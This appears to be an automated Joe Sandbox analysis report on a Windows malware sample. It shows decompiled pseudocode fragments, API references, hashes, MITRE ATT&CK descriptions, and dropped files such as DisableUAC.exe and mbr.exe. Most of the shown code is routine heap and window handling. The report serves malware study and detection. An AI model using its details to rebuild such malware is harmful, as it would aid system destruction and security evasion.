				E00000001140013F60(0x28, _t31, 0x4001d538);
				_t50 = _t31;
				if (_t31 == 0) goto 0x4000d50f;
				 *_t31 = 0x332c;
				_t19 = CreateSolidBrush(??);
				 *((intOrPtr*)(_t50 + 0x10)) = 1;
				 *((long long*)(_t50 + 8)) = _t31;
				LeaveCriticalSection(??);
				return _t19;
			}

0x14000d438
0x14000d438
0x14000d43d
0x14000d44d
0x14000d45c
0x14000d46d
0x14000d482
0x14000d487
0x14000d490
0x14000d491
0x14000d496
0x14000d497
0x14000d498
0x14000d49d
0x14000d4b2
0x14000d4b8
0x14000d4bf
0x14000d4c5
0x14000d4c7
0x14000d4cd
0x14000d4cf
0x14000d4d5
0x14000d4dc
0x14000d4ea
0x14000d4ef
0x14000d4f5
0x14000d4f9
0x14000d4fb
0x14000d501
0x14000d50b
0x14000d516
0x14000d52e

APIs

Part of subcall function 000000014000D37C: GetParent.USER32 ref: 000000014000D3A6

GetPropA.USER32 ref: 000000014000D45C
GetWindowLongPtrA.USER32 ref: 000000014000D46D

Strings

PB_WindowID, xrefs: 000000014000D452

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: LongParentPropWindow
String ID: PB_WindowID
API String ID: 1999142876-1508741625
Opcode ID: 41011620c95efa8ea40fa5c87aebd6ef7d5f89f5c040152d3a3275d62dbe4512
Instruction ID: de1232b4d45ce4016daa825160c1b6e7e766fa14368177122aac82db55de92aa
Opcode Fuzzy Hash: 41011620c95efa8ea40fa5c87aebd6ef7d5f89f5c040152d3a3275d62dbe4512
Instruction Fuzzy Hash: 24F0A070604B8082EA158763B8843D96321EB8CBD0F049121BF0A0B7A8DF38C241C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000D37C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetPropA.USER32 ref: 000000014000D395
GetParent.USER32 ref: 000000014000D3A6

Strings

PB_WindowID, xrefs: 000000014000D38B

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: ParentProp
String ID: PB_WindowID
API String ID: 919147419-1508741625
Opcode ID: 5f61f1538a80930dfaf9dcadd05c8d5726468311879e25d2084b81eaf2896079
Instruction ID: d8183778b5174d4050164c38dc41576bb22bee2b3c110eca32b818233451f87a
Opcode Fuzzy Hash: 5f61f1538a80930dfaf9dcadd05c8d5726468311879e25d2084b81eaf2896079
Instruction Fuzzy Hash: EEE0467030AB8581EE5A8B17BA803E8A261AB4CFC4F4C5026EF0A0B765EF3CC5858301

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400069B0 Relevance: 5.2, APIs: 4, Instructions: 164
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E000000011400069B0(void* __ebp, signed char* __rax, long long __rbx, signed int __rcx, void* __rdx, long long __rsi) {
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				signed int _t49;
				void* _t50;
				void* _t51;
				signed int _t55;
				void* _t57;
				intOrPtr _t62;
				signed char* _t85;
				signed char* _t91;
				signed char* _t92;
				signed char* _t93;
				signed char* _t94;
				long long _t100;
				long _t118;
				void* _t121;
				signed char* _t131;
				long long _t134;
				signed char* _t136;
				void* _t144;
				void* _t145;
				void* _t153;
				void* _t157;
				void* _t160;
				void* _t162;

				_t85 = __rax;
				 *((long long*)(_t144 + 0x10)) = __rbx;
				 *((long long*)(_t144 + 0x18)) = _t134;
				 *((long long*)(_t144 + 0x20)) = __rsi;
				_t145 = _t144 - 0x40;
				r14d = r9d;
				r15d = r8d;
				if (__rcx == 0) goto 0x400069f8;
				asm("repne scasb");
				_t100 =  !(__rcx | 0xffffffff) - 1;
				 *((long long*)(_t145 + 0x20)) = _t100;
				goto 0x400069ff;
				 *((long long*)(_t145 + 0x20)) = _t100;
				_t36 = E000000011400147F0(_t51, _t57, __rcx, _t162);
				_t37 = E000000011400147F0(_t51, _t57, __rdx, _t160);
				r12d = _t37;
				 *((intOrPtr*)(_t145 + 0x70)) = _t37;
				_t38 = E00000001140014840(_t37, 0,  *((intOrPtr*)(_t145 + 0x98)), _t157);
				if (_t36 == 0) goto 0x40006a37;
				_t39 = E000000011400148F0(_t38, _t36);
				_t91 = _t85;
				if (r12d == 0) goto 0x40006a47;
				E000000011400148F0(_t39, r12d);
				_t136 = _t85;
				if (_t91 == 0) goto 0x40006bab;
				if ( *_t91 == 0) goto 0x40006bab;
				if (_t136 == 0) goto 0x40006b88;
				if ( *_t136 == 0) goto 0x40006b88;
				asm("repne scasb");
				 *(_t145 + 0x30) = _t91;
				if ( *((intOrPtr*)(_t145 + 0x70)) == 0) goto 0x40006ac4;
				HeapAlloc(_t153, _t118);
				 *(_t145 + 0x28) = _t85;
				_t55 =  *_t136 & 0x000000ff;
				 *(_t85 - _t136 +  &(_t136[1]) - 1) = _t55;
				if (_t55 != 0) goto 0x40006ab0;
				goto 0x40006ace;
				 *(_t145 + 0x28) =  *((intOrPtr*)(_t145 + 0x70));
				_t164 =  !=  ? 0x4001542e : 0x40015416;
				if (r14d - 1 <= 0) goto 0x40006b05;
				_t121 = _t160 - 1;
				strncpy(??, ??, ??);
				_t92 =  &(_t91[_t121]);
				if ( *_t92 == 0) goto 0x40006b66;
				_t62 =  *((intOrPtr*)(_t145 + 0x90));
				if ( *((long long*)( !=  ? 0x4001542e : 0x40015416))() != 0) goto 0x40006b55;
				_t93 =  &(_t92[r12d]);
				if (_t62 == 0xffffffff) goto 0x40006b61;
				if (_t62 - 1 > 0) goto 0x40006b61;
				strncpy(??, ??, ??);
				goto 0x40006b6b;
				_t131 =  &(( &(( &(_t85[_t121]))[__ebp - _t93 +  *(_t145 + 0x30)]))[1]);
				_t94 =  &(_t93[1]);
				 *((char*)(_t131 - 1)) =  *_t93 & 0x000000ff;
				if ( *_t94 != 0) goto 0x40006b14;
				if ( *((intOrPtr*)(_t145 + 0x70)) == 0) goto 0x40006bb0;
				HeapFree(??, ??, ??);
				goto 0x40006bb0;
				_t49 =  *_t94 & 0x000000ff;
				 *(_t131 - _t94 +  &(_t94[1]) - 1) = _t49;
				if (_t49 != 0) goto 0x40006b90;
				goto 0x40006bb0;
				r13d = r13d;
				_t50 = E000000011400149E0(_t49,  *((intOrPtr*)(_t145 + 0x20)) + _t85);
				_t131[__ebp] = 0;
				return _t50;
			}

0x1400069b0
0x1400069b0
0x1400069b5
0x1400069ba
0x1400069c8
0x1400069cc
0x1400069cf
0x1400069db
0x1400069e6
0x1400069eb
0x1400069f1
0x1400069f6
0x1400069fa
0x140006a02
0x140006a0c
0x140006a1a
0x140006a1d
0x140006a21
0x140006a2b
0x140006a2f
0x140006a34
0x140006a3a
0x140006a3f
0x140006a44
0x140006a4d
0x140006a56
0x140006a5f
0x140006a69
0x140006a78
0x140006a7a
0x140006a8a
0x140006a98
0x140006aa1
0x140006ab0
0x140006ab7
0x140006abd
0x140006ac2
0x140006ac9
0x140006ae0
0x140006ae8
0x140006af4
0x140006afa
0x140006b02
0x140006b08
0x140006b0a
0x140006b22
0x140006b24
0x140006b2a
0x140006b30
0x140006b4b
0x140006b53
0x140006b58
0x140006b5b
0x140006b5e
0x140006b64
0x140006b70
0x140006b80
0x140006b86
0x140006b90
0x140006b96
0x140006b9c
0x140006ba9
0x140006bb0
0x140006bb8
0x140006bc2
0x140006bdd

APIs

HeapAlloc.KERNEL32 ref: 0000000140006A98
strncpy.MSVCRT ref: 0000000140006AFA
strncpy.MSVCRT ref: 0000000140006B4B
HeapFree.KERNEL32 ref: 0000000140006B80

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heapstrncpy$AllocFree
String ID:
API String ID: 2298710462-0
Opcode ID: c7e8b50cf0c4735883cf75a115d4696dc08cca46d1d0af5cd3691ade6c859198
Instruction ID: 14a1e7d02998c425f85cb8dcf5078cef31cddec18bf51a0d0e75adf5584b5e1f
Opcode Fuzzy Hash: c7e8b50cf0c4735883cf75a115d4696dc08cca46d1d0af5cd3691ade6c859198
Instruction Fuzzy Hash: 1E51C5B26046808AE762DB37B8043EA7691B74DBD4F584225BF595BBE6DF3CC441C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013960 Relevance: 5.1, APIs: 4, Instructions: 121memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140013982
HeapAlloc.KERNEL32 ref: 0000000140013A55
HeapAlloc.KERNEL32 ref: 0000000140013A79
LeaveCriticalSection.KERNEL32 ref: 0000000140013AE2

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 51a7b6cb35e2371052bec7529952f5089b1177797545ea1fbfd68a44ba7d2ff8
Instruction ID: 8334c273bebd3891ae59e66d6174dcafc0bf871a6cdbfc35d704b62cfb81918e
Opcode Fuzzy Hash: 51a7b6cb35e2371052bec7529952f5089b1177797545ea1fbfd68a44ba7d2ff8
Instruction Fuzzy Hash: C0514772201B44D6EB568F26D0803AC73A4FB4CF88F58852ADB8D4BB68DB39D4A1C741

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140012390 Relevance: 5.1, APIs: 4, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00000001140012390(void* __ebp, long long __rax, long long __rbx, long long* __rcx, long long __rdx, long long __rsi, long long __rbp, signed int __r11, long long _a8, long long _a16, long long _a24) {
				void* _t37;
				void* _t47;
				signed int _t53;
				long long _t62;
				long long* _t67;
				long long _t84;
				long long _t91;

				_t62 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t91 = __rdx;
				_t67 = __rcx;
				if (r8d == 0) goto 0x400123d6;
				E000000011400120BC(__rcx, __rcx, __rdx, __rsi, __rdx);
				if (_t62 == 0) goto 0x400123d6;
				if ( *((intOrPtr*)(_t67 + 0x20)) == 0) goto 0x40012463;
				_t37 = E00000001140014FC8(_t67, _t62,  *((intOrPtr*)(_t67 + 0x20)));
				goto 0x40012463;
				_t88 =  !=  ? _t91 : 0x400196e6;
				if (( *(_t67 + 0x44) & 0x00000001) == 0) goto 0x400123f4;
				E0000000114001255C(_t37, _t67, 0x400196e6);
				goto 0x400123f9;
				_t53 = E00000001140012544(_t47, _t67, 0x400196e6) %  *(_t67 + 0x3c);
				E00000001140013960(_t67,  *((intOrPtr*)(_t67 + 0x58)),  !=  ? _t91 : 0x400196e6, _t91);
				_t84 = _t62;
				if (_t62 == 0) goto 0x40012488;
				strlen(??);
				HeapAlloc(??, ??, ??);
				 *((long long*)(_t84 + 8)) = _t62;
				strcpy(??, ??);
				r11d = _t53;
				 *_t84 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 8)) + __r11 * 8));
				 *((long long*)( *((intOrPtr*)(_t67 + 8)) + __r11 * 8)) = _t84;
				 *(_t67 + 0x10) =  *(_t67 + 0x10) & 0x00000000;
				 *((intOrPtr*)(_t67 + 0x40)) =  *((intOrPtr*)(_t67 + 0x40)) + 1;
				 *_t67 = _t84;
				 *(_t67 + 0x28) = _t53;
				if (_t84 + 0x10 == 0) goto 0x40012488;
				memset(??, ??, ??);
				if (( *(_t67 + 0x44) & 0x00000002) == 0) goto 0x40012488;
				return E00000001140014A8C(_t84 + 0x10,  *((intOrPtr*)(_t67 + 0x20)));
			}

0x140012390
0x140012390
0x140012395
0x14001239a
0x1400123a4
0x1400123a7
0x1400123ad
0x1400123af
0x1400123ba
0x1400123c3
0x1400123cc
0x1400123d1
0x1400123e0
0x1400123eb
0x1400123ed
0x1400123f2
0x140012402
0x140012404
0x140012409
0x14001240f
0x140012414
0x140012426
0x140012432
0x140012436
0x14001243f
0x140012446
0x14001244d
0x140012451
0x140012456
0x140012459
0x14001245c
0x140012466
0x140012471
0x14001247a
0x14001249f

APIs

strlen.MSVCRT ref: 0000000140012414
HeapAlloc.KERNEL32 ref: 0000000140012426
strcpy.MSVCRT(?,?,?,021A66F0,000000014001201C,?,?,?,?,0000000140002ABB), ref: 0000000140012436
memset.MSVCRT ref: 0000000140012471

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocHeapmemsetstrcpystrlen
String ID:
API String ID: 4049419128-0
Opcode ID: 6b104a910646187215caef289a7890305403fb675ee90bb8b1d6dc5bcb53e2d3
Instruction ID: e1cd42857b0050ea7807eeeb61854664eac2a926f1131ba44f4461fc165bd275
Opcode Fuzzy Hash: 6b104a910646187215caef289a7890305403fb675ee90bb8b1d6dc5bcb53e2d3
Instruction Fuzzy Hash: C0314B75605B4482EB1AEF67A1443EC77A1EB8CFC4F588115AF490F7AADF3AC4618740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140013C34 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140013C4B
HeapFree.KERNEL32 ref: 0000000140013C66
HeapFree.KERNEL32 ref: 0000000140013C88
LeaveCriticalSection.KERNEL32 ref: 0000000140013CAE

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 8bacc2e6c55cd79bd6dcdcdf09f728a5924766dbaac4f919c6ef4d6bc04078a5
Instruction ID: 3b2fa561c7bf24a1b863e3c0ca40e27dbeeb79c863f14bbce481da446767edf3
Opcode Fuzzy Hash: 8bacc2e6c55cd79bd6dcdcdf09f728a5924766dbaac4f919c6ef4d6bc04078a5
Instruction Fuzzy Hash: 58114C76610B8492EB56CF53E5943E863A0FB5CBC4F484416EF561BA61DF3AC4A4C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140012028 Relevance: 5.0, APIs: 4, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00000001140012028(long long __rbx, void* __rcx, long long _a8) {
				void* _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t41;
				void* _t44;

				_t23 = __rbx;
				if (__rcx == 0) goto 0x400120b9;
				_a8 = __rbx;
				_t33 = __rcx;
				E000000011400124A0(__rcx, __rbx, __rcx, _t35, _t44, _t32);
				E00000001140013CC0(_t23,  *((intOrPtr*)(_t33 + 0x58)));
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				_t41 =  *((intOrPtr*)(_t33 + 0x50));
				if (_t41 == 0) goto 0x40012095;
				HeapFree(??, ??, ??);
				if ( *_t41 != 0) goto 0x4001207b;
				 *( *(_t33 + 0x48)) =  *( *(_t33 + 0x48)) & 0x00000000;
				return HeapFree(??, ??, ??);
			}

0x140012028
0x14001202b
0x140012031
0x14001203b
0x14001203e
0x140012047
0x140012059
0x14001206c
0x140012072
0x140012079
0x140012087
0x140012093
0x14001209e
0x1400120b9

APIs

Part of subcall function 00000001400124A0: memset.MSVCRT ref: 0000000140012523

Part of subcall function 0000000140013CC0: EnterCriticalSection.KERNEL32 ref: 0000000140013CDD
Part of subcall function 0000000140013CC0: HeapFree.KERNEL32 ref: 0000000140013D40
Part of subcall function 0000000140013CC0: LeaveCriticalSection.KERNEL32 ref: 0000000140013D4D

HeapFree.KERNEL32 ref: 0000000140012059
HeapFree.KERNEL32 ref: 000000014001206C
HeapFree.KERNEL32 ref: 0000000140012087
HeapFree.KERNEL32 ref: 00000001400120A9

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: d7495bd991eda3b02d9b8811b097a124c465c3c275dcde34e3547b2edc2467a2
Instruction ID: 1a31a29b6e7ff7ad059e8958e8f60066c4f16f35fb22658bb43dd3ced5e9e75c
Opcode Fuzzy Hash: d7495bd991eda3b02d9b8811b097a124c465c3c275dcde34e3547b2edc2467a2
Instruction Fuzzy Hash: B801A975650B4486EB16DBA3E9543EA2361FB8DBC4F884412EF0A0BB66CF3AC461C341

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Baldi\7note.mp3

C:\Baldi\Baldi.exe

C:\Baldi\CleanZUpdater.bat

C:\Baldi\DisableUAC.exe

C:\Baldi\kill.exe

C:\Baldi\lol.png

C:\Baldi\mbr.exe

C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
file.exe

Function 004030FA Relevance: 70.3, APIs: 24, Strings: 16, Instructions: 270
filestringcomCOMMON

Function 00405D2E Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 00403555 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C22 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00402E5B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174
fileCOMMON

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 00405712 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 0040526C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Function 004030C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON